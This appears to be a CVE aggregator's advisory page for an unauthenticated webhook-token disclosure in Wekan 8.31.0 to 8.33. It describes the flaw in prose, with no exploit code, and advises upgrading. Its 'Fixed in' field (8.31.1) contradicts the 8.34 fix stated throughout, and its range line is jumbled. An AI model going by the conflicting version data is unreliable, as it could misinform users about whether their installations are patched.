MEDIUMCVE-2026-30846

CVE-2026-30846: Information Disclosure in Wekan Kanban Tool

Q: What is CVE-2026-30846 — Information Disclosure in Wekan?

CVE-2026-30846 is an information disclosure vulnerability in Wekan versions 8.31.0 through 8.33, allowing unauthenticated access to webhook URLs and tokens.

Q: Am I affected by CVE-2026-30846 in Wekan?

You are affected if you are running Wekan versions 8.31.0 through 8.33. Upgrade to version 8.34 to mitigate the risk.

Q: How do I fix CVE-2026-30846 in Wekan?

Upgrade Wekan to version 8.34 or later. If immediate upgrade is not possible, restrict network access and monitor webhook activity.

Q: Is CVE-2026-30846 being actively exploited?

There is no confirmed active exploitation of CVE-2026-30846 as of the last update, but the vulnerability's ease of exploitation warrants caution.

Q: Where can I find the official Wekan advisory for CVE-2026-30846?

Refer to the Wekan project's official website and GitHub repository for the latest security advisories and updates.

Platform

nodejs

Component

wekan

Fixed in

8.31.1

AI Confidence: highNVDEPSS 0.1%Reviewed: May 2026

View on NVD

Save

CVE-2026-30846 is an information disclosure vulnerability affecting Wekan, an open-source kanban tool. This flaw allows unauthenticated attackers to retrieve sensitive webhook integration data, including URLs and authentication tokens. The vulnerability impacts Wekan versions 8.31.0 through 8.33 and has been resolved in version 8.34.

Impact and Attack Scenarios

The primary impact of CVE-2026-30846 is the exposure of sensitive webhook integration data. Attackers can exploit this vulnerability to gain unauthorized access to systems and services integrated with Wekan webhooks. This could lead to data breaches, unauthorized actions, and potential compromise of connected applications. The lack of authentication checks on the server-side publication makes this vulnerability particularly concerning, as any DDP client can subscribe and retrieve the data. This is similar to other DDP-related vulnerabilities where improper access controls lead to data leakage.

Exploitation Context

CVE-2026-30846 was publicly disclosed on 2026-03-06. No public proof-of-concept (PoC) code has been released as of this writing. The EPSS score is currently pending evaluation. It is not currently listed on the CISA KEV catalog.

Threat Intelligence

Exploit Status

Proof of ConceptUnknown

CISA KEVNO

Reports1 threat report

EPSS

0.15% (35% percentile)

CISA SSVC

Exploitationnone

Automatableyes

Technical Impactpartial

Affected Software

Componentwekan

VendorWekan

Affected rangeFixed in

>= 8.31.0, < 8.34 – >= 8.31.0, < 8.348.31.1

Weakness Classification (CWE)

CWE-306 CWE-200

Timeline

Reserved2026-03-05
Published2026-03-06
Modified2026-03-09
EPSS updated2026-03-23

Mitigation and Workarounds

The primary mitigation for CVE-2026-30846 is to upgrade Wekan to version 8.34 or later, which includes the necessary access control fixes. If upgrading immediately is not possible, consider implementing temporary workarounds such as restricting network access to the Wekan instance and monitoring webhook activity for suspicious behavior. While a WAF or proxy cannot directly prevent the vulnerability, it can help detect and block malicious requests attempting to exploit it. After upgrading, confirm the fix by attempting to subscribe to the globalwebhooks publication with an unauthenticated DDP client and verifying that access is denied.

How to fix

Update Wekan to version 8.34 or higher. This version fixes the vulnerability that exposes global webhook integrations without authentication. The update will prevent unauthorized access to webhook URLs and tokens.

CVE Security Newsletter

Vulnerability analysis and critical alerts directly to your inbox.

Frequently asked questions

What is CVE-2026-30846 — Information Disclosure in Wekan?